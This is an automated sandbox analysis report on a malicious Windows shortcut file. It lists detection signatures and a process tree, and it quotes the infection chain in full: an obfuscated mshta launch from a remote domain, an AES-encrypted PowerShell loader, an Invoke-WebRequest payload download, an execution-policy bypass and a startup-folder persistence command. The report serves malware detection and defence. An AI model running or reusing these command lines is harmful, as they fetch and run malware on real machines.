Edit tour

Windows Analysis Report
tzA45NGAW4.lnk

Overview

General Information

Sample name:	tzA45NGAW4.lnk renamed because original name is a hash value
Original sample name:	1fa8842a7e4debf7bf9e6c03773aa49c.lnk
Analysis ID:	1581591
MD5:	1fa8842a7e4debf7bf9e6c03773aa49c
SHA1:	cf2e60beff20f46a633020cf3a32e3cb6bf2eaae
SHA256:	34dd7e196ad94c9a7cf1858a0c7b8147bec90f9eb4b5179b37de9629fa24ce32
Tags:	lnkuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Bypasses PowerShell execution policy

Contains functionality to create processes via WMI

Creates processes via WMI

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Powershell drops PE file

Sigma detected: Execution from Suspicious Folder

Sigma detected: Execution of Powershell Script in Public Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Process Created Via Wmic.EXE

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Windows shortcut file (LNK) contains suspicious command line arguments

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

WMIC.exe (PID: 7404 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7488 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712') MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/Ghep2712" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 7728 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/Ghep2712 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FFAFE1D5CAC03DFDA56DCA95FF5424D15D2201EE63774AEF024E5D3441D0810D093A2A8E480D6D4B525FA6FC903E3BDB710FFAE3E893622CE5C8764591B00B8FC9C8100BDA923A83E6F8B88E69B0755D3228D1DC52C7C67BB3B24C6C30B777A5DDDC87AE8DF799E072F9A5A2E930038C7145315FA2576ADA033D15A7764469DE0BD65B7F9E89E55EA0317333FB845BB4339BA707D00A5B4FD12EF2BCA27548187BE559BD1E7662E4B6C54CE3999E1730EED4F58C611CC3B8C64086B0FF8A572FBC600798C70C4872E23D8DFEC08E57EC5BD8C46AD07560467116EEE5F8C78F0BB81E4E5B3A4C92473CAC6FC01E77EEA8F5860B14D885342EF00B915D9B9277B47DD62E92385866D4F08595B75FD3416076067E9C9C3A909D66C4807D3D34D802E94AFD77152A2E8719F1DB90EEEC5D5288DCDA7A440771A416DB8635C548C523B726DA123203E5BB32B7F0239E81E2E1C9948A2D9629655467B0C4210B5562746710458C26E13B06B0E5A0667F3D764E09D22E4F04DB3052359BDDB7C937C0FFC5E7B6BF7B398E140333E5B5B9741857518CBFC0A86CC2756344C085D6D9F6503AEF5967D61A95B8ED8B25A8DB23CFE55452E36DCEAB63EE4F1AA5BB09A1530D0D56F7123EA0E9278D6930295A53624251959B73A845ABD6AFC47B295DDF6B8083CD04B85C0789E0F09013BCBE631B9551A179D39DB7491A04A601C6E09CA8FF994D713877D75EA86A31FF9EC9B2C557BAE8C6A494EA46A84FC08A7DAC1B5ADDD84771E1AEFEEB3418328847AD5670D846972DBA8193DD696F0A22D11217E461ED7E46B33E2EF47F12B09657CB01CC3AE86335B6E69B306E63FDAC762CA62A91E39E7778E3A0CD5C1637FDF8E8F1AEAC86E8AA27EA3EBCD0BF91EFC1995D43D53A9537E8D0E5690CED64DD12BDF582DA4670F8EEC5BD3A43AC5AE823CFCDD2974718561BB5BE154E812A135FF700C05380B3B3283B4E089BA3450995E7D234293C2E6735402BE512FEF974C3031038C10F930900474FD65A4B2251379752BD260DCE20B2B16C34BB0B9B2D96015FEA98D2CA49F108194FF06C88A1B9C28318067753820430FCFFAE689D4A1AF2F1FA1E72325BC53D6460FFF8B5D895BAD7A4562A18E2129A5D836FCFF6CF002491AE00BA0D48891008E3FA63EE6F968719585482A9C78C05CD826A70C2500B84CD750008340587F705F63C221378C17C1FC4F620B61B035696056491071F78A3D4E95A1343424E7664744E454A61727570646663';function HUI ($CXfuOnjU){return -split ($CXfuOnjU -replace '..', '0x$& ')};$FMWRG = HUI($ddg.SubString(0, 2048));$oeC = [System.Security.Cryptography.Aes]::Create();$oeC.Key = HUI($ddg.SubString(2048));$oeC.IV = New-Object byte[] 16;$gVhTqzko = $oeC.CreateDecryptor();$JNWNnV = [System.String]::new($gVhTqzko.TransformFinalBlock($FMWRG, 0,$FMWRG.Length)); sal fd $JNWNnV.Substring(3,3); fd $JNWNnV.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Acrobat.exe (PID: 7172 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 3392 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7220 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2056 --field-trial-handle=1580,i,9458825492255786744,15247656266253398828,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

qJXhXwR.exe (PID: 7720 cmdline: "C:\Users\user\AppData\Roaming\qJXhXwR.exe" MD5: 2B5ED481EEE9DE59066B4859C2BD354A)

powershell.exe (PID: 7556 cmdline: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7640 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Guard.exe (PID: 7288 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 2320 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

wscript.exe (PID: 8176 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

SwiftWrite.pif (PID: 7584 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1]	emmenhtal_strings_hta_exe	Emmenhtal Loader string	Sekoia.io	0x3c1cd:$char: = String.fromCharCode(FB,vd, 0x3c1c6:$var: var 0x57c84:$eval: eval( 0x3c04f:$script1: <script> 0x57c7a:$script1: <script> 0x43c71:$script2: </script>MZ 0x57ca0:$script2: </script>MZ

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7640, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7288, ProcessName: Guard.exe

Sigma detected: Execution of Powershell Script in Public Folder

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\qJXhXwR.exe" , ParentImage: C:\Users\user\AppData\Roaming\qJXhXwR.exe, ParentProcessId: 7720, ParentProcessName: qJXhXwR.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7640, ProcessName: powershell.exe

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7288, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 2320, ProcessName: cmd.exe

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/Ghep2712, CommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/Ghep2712, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/Ghep2712", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/Ghep2712, ProcessId: 7728, ProcessName: mshta.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\qJXhXwR.exe" , ParentImage: C:\Users\user\AppData\Roaming\qJXhXwR.exe, ParentProcessId: 7720, ParentProcessName: qJXhXwR.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7640, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\qJXhXwR.exe" , ParentImage: C:\Users\user\AppData\Roaming\qJXhXwR.exe, ParentProcessId: 7720, ParentProcessName: qJXhXwR.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7556, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FFAFE1D5CAC03DFDA56DCA95FF5424D15D2201EE63774AEF024E5D3441D0810D093A2A8E480D6D4B525FA6FC903E3BDB710FFAE3E893622CE5C8764591B00B8FC9C8100BDA923A83E6F8B88E69B0755D3228D1DC52C7C67BB3B24C6C30B777A5DDDC87AE8DF799E072F9A5A2E930038C7145315FA2576ADA033D15A7764469DE0BD65B7F9E89E55EA0317333FB845BB4339BA707D00A5B4FD12EF2BCA27548187BE559BD1E7662E4B6C54CE3999E1730EED4F58C611CC3B8C64086B0FF8A572FBC600798C70C4872E23D8DFEC08E57EC5BD8C46AD07560467116EEE5F8C78F0BB81E4E5B3A4C92473CAC6FC01E77EEA8F5860B14D885342EF00B915D9B9277B47DD62E92385866D4F08595B75FD3416076067E9C9C3A909D66C4807D3D34D802E94AFD77152A2E8719F1DB90EEEC5D5288DCDA7A440771A416DB8635C548C523B726DA123203E5BB32B7F0239E81E2E1C9948A2D9629655467B0C4210B5562746710458C26E13B06B0E5A0667F3D764E09D22E4F04DB3052359BDDB7C937C0FFC5E7B6BF7B398E140333E5B5B9741857518CBFC0A86CC2756344C085D6D9F6503AEF5967D61A95B8ED8B25A8DB23CFE55452E36DCEAB63EE4F1AA5BB09A1530D0D56F7123EA0E9278D6930295A53624251959B73A845ABD6AFC47B295DDF6B8083CD04B85C0789E0F09013BCBE631B9551A179D39DB7491A04A601C6E09CA8FF994D713877D75EA86A31FF9EC9B2C557BAE8C6A494EA46A84FC08A7DAC1B5ADDD84771E1AEFEEB3418328847AD5670D846972DBA8193DD696F0A22D11217E461ED7E46B33E2EF47F12B09657CB01CC3AE86335B6E69B306E63FDAC762CA62A91E39E7778E3A0CD5C1637FDF8E8F1AEAC86E8AA27EA3EBCD0BF91EFC1995D43D53A9537E8D0E5690CED64DD12BDF582DA4670F8EEC5BD3A43AC5AE823CFCDD2974718561BB5BE154E812A135FF700C05380B3B3283B4E089BA3450995E7D234293C2E6735402BE512FEF974C3031038C10F930900474FD65A4B2251379752BD260DCE20B2B16C34BB0B9B2D96015FEA98D2CA49F108194FF06C88A1B9C28318067753820430FCFFAE689D4A1AF2F1FA1E72325BC53D6460FFF8B5D895BAD7A4562A18E2129A5D836FCFF6CF002491AE00BA0D48891008E3FA63EE6F968719585482A9C78C05CD826A70C2500B84CD750008340587F705F63C221378C17C1FC4F620B61B035696056491071F78A3D4E95A1343424E7664744E454A61727570646663';function HUI ($CXfuOnjU){return -split ($CXfuOnjU -replace '..', '0x$& ')};$FMWRG = HUI($ddg.SubString(0, 2048));$oeC = [System.Security.Cryptography.Aes]::Create();$oeC.Key = HUI($ddg.SubString(2048));$oeC.IV = New-Object byte[] 16;$gVhTqzko = $oeC.CreateDecryptor();$JNWNnV = [System.String]::new($gVhTqzko.TransformFinalBlock($FMWRG, 0,$FMWRG.Length)); sal fd $JNWNnV.Substring(3,3); fd $JNWNnV.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FF

Sigma detected: Suspicious Process Created Via Wmic.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')", ProcessId: 7404, ProcessName: WMIC.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8176, ProcessName: wscript.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7556, TargetFilename: C:\Users\Public\Guard.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FFAFE1D5CAC03DFDA56DCA95FF5424D15D2201EE63774AEF024E5D3441D0810D093A2A8E480D6D4B525FA6FC903E3BDB710FFAE3E893622CE5C8764591B00B8FC9C8100BDA923A83E6F8B88E69B0755D3228D1DC52C7C67BB3B24C6C30B777A5DDDC87AE8DF799E072F9A5A2E930038C7145315FA2576ADA033D15A7764469DE0BD65B7F9E89E55EA0317333FB845BB4339BA707D00A5B4FD12EF2BCA27548187BE559BD1E7662E4B6C54CE3999E1730EED4F58C611CC3B8C64086B0FF8A572FBC600798C70C4872E23D8DFEC08E57EC5BD8C46AD07560467116EEE5F8C78F0BB81E4E5B3A4C92473CAC6FC01E77EEA8F5860B14D885342EF00B915D9B9277B47DD62E92385866D4F08595B75FD3416076067E9C9C3A909D66C4807D3D34D802E94AFD77152A2E8719F1DB90EEEC5D5288DCDA7A440771A416DB8635C548C523B726DA123203E5BB32B7F0239E81E2E1C9948A2D9629655467B0C4210B5562746710458C26E13B06B0E5A0667F3D764E09D22E4F04DB3052359BDDB7C937C0FFC5E7B6BF7B398E140333E5B5B9741857518CBFC0A86CC2756344C085D6D9F6503AEF5967D61A95B8ED8B25A8DB23CFE55452E36DCEAB63EE4F1AA5BB09A1530D0D56F7123EA0E9278D6930295A53624251959B73A845ABD6AFC47B295DDF6B8083CD04B85C0789E0F09013BCBE631B9551A179D39DB7491A04A601C6E09CA8FF994D713877D75EA86A31FF9EC9B2C557BAE8C6A494EA46A84FC08A7DAC1B5ADDD84771E1AEFEEB3418328847AD5670D846972DBA8193DD696F0A22D11217E461ED7E46B33E2EF47F12B09657CB01CC3AE86335B6E69B306E63FDAC762CA62A91E39E7778E3A0CD5C1637FDF8E8F1AEAC86E8AA27EA3EBCD0BF91EFC1995D43D53A9537E8D0E5690CED64DD12BDF582DA4670F8EEC5BD3A43AC5AE823CFCDD2974718561BB5BE154E812A135FF700C05380B3B3283B4E089BA3450995E7D234293C2E6735402BE512FEF974C3031038C10F930900474FD65A4B2251379752BD260DCE20B2B16C34BB0B9B2D96015FEA98D2CA49F108194FF06C88A1B9C28318067753820430FCFFAE689D4A1AF2F1FA1E72325BC53D6460FFF8B5D895BAD7A4562A18E2129A5D836FCFF6CF002491AE00BA0D48891008E3FA63EE6F968719585482A9C78C05CD826A70C2500B84CD750008340587F705F63C221378C17C1FC4F620B61B035696056491071F78A3D4E95A1343424E7664744E454A61727570646663';function HUI ($CXfuOnjU){return -split ($CXfuOnjU -replace '..', '0x$& ')};$FMWRG = HUI($ddg.SubString(0, 2048));$oeC = [System.Security.Cryptography.Aes]::Create();$oeC.Key = HUI($ddg.SubString(2048));$oeC.IV = New-Object byte[] 16;$gVhTqzko = $oeC.CreateDecryptor();$JNWNnV = [System.String]::new($gVhTqzko.TransformFinalBlock($FMWRG, 0,$FMWRG.Length)); sal fd $JNWNnV.Substring(3,3); fd $JNWNnV.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FF

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

